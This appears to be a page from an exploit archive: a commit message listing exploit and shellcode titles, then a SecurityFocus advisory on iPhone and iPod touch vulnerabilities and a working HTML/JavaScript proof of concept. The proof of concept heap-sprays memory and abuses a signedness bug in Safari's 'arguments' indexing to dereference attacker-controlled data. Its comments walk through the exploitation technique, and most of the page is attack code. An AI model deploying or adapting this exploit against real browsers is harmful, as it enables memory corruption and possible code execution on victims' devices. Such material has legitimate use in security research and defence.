880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
74 lines
No EOL
4.7 KiB
HTML
74 lines
No EOL
4.7 KiB
HTML
source: https://www.securityfocus.com/bid/30186/info
|
|
|
|
Apple iPhone and iPod touch are prone to multiple remote vulnerabilities:
|
|
|
|
1. A vulnerability that may allow users to spoof websites.
|
|
2. An information-disclosure vulnerability.
|
|
3. A buffer-overflow vulnerability.
|
|
4. Two memory-corruption vulnerabilities.
|
|
|
|
Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible.
|
|
|
|
These issues affect iPhone 1.0 through 1.1.4 and iPod touch 1.1 through 1.1.4.
|
|
|
|
<BODY>
|
|
<SCRIPT src="HeapSpray2.js"></SCRIPT>
|
|
<CODE id="sploit status"></CODE>
|
|
<CODE id="heapspray status"></CODE>
|
|
<SCRIPT>
|
|
// The index for the "arguments" array in a JavaScript function in
|
|
// Safari suffers from a signedness issue that allows access to elements
|
|
// that are out of bounds. The index is cast to a signed value before it
|
|
// is compared to the length of the array to check if it within the
|
|
// bounds. Integer values larger than 0x8000,0000 will be cast to a
|
|
// negative value and because they are always smaller then the length,
|
|
// they are treated as a valid index.
|
|
// The index into the arguments array ends up in instructions
|
|
// that multiply it by 4 to access data in an array of 32 bit values.
|
|
// There are no checks for overflows in this calculation. This allows us
|
|
// to cause it to access anything in memory:
|
|
// Pointer to object = base address + 4 * index
|
|
// The base address varies only slightly and is normally about
|
|
// 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
|
|
// predictable location using heap spraying, we can then calculate an
|
|
// index that will access this memory.
|
|
var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
|
|
var iTargetArea = 0x10000000;
|
|
// Be advised that heap spraying is "upside down" in Safari: strings
|
|
// are allocated at high addresses first and as the heap grows, the
|
|
// addresses go down. The heap will therefor grow in between a lot of
|
|
// DLLs which reside in this area of the address space as well.
|
|
// We'll need to find an area of memory to spray that is not likely to
|
|
// contain a DLL and easy to reach.
|
|
var iTargetAddress = 0x55555555;
|
|
// iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
|
|
// 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
|
|
var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0)
|
|
// iIndex = (iTargetAddress - iBase) / 4
|
|
var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
|
|
// We need to trigger the signedness issue so the index must be larger
|
|
// then 0x8000,0000. Because of the integer overflow in the
|
|
// multiplication, we can safely add 0x4000,0000 as often as we want;
|
|
// the multiplication will remove it from the result.
|
|
while (iIndex < 0x80000000) iIndex += 0x40000000
|
|
document.getElementById("sploit status").innerHTML = (
|
|
"iBase + 4 * iIndex = " +
|
|
"0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
|
|
"0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
|
|
);
|
|
// Set up heap spray
|
|
var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
|
|
oHeapSpray.oOutputElement = document.getElementById("heapspray status")
|
|
// Spray heap asynchronously and call sploit when done.
|
|
oHeapSpray.spray(sploit)
|
|
function sploit(oHeapSpray) {
|
|
// This will cause an access violation using the value 0xDEADBEEF,
|
|
// which comes from the strings we sprayed the heap with.
|
|
// 6aa3d57f 8b4f0c mov ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
|
|
arguments[iIndex];
|
|
}
|
|
function DWORD(iValue) {
|
|
return String.fromCharCode(iValue & 0xFFFF, iValue >> 16)
|
|
}
|
|
</SCRIPT>
|
|
</BODY> |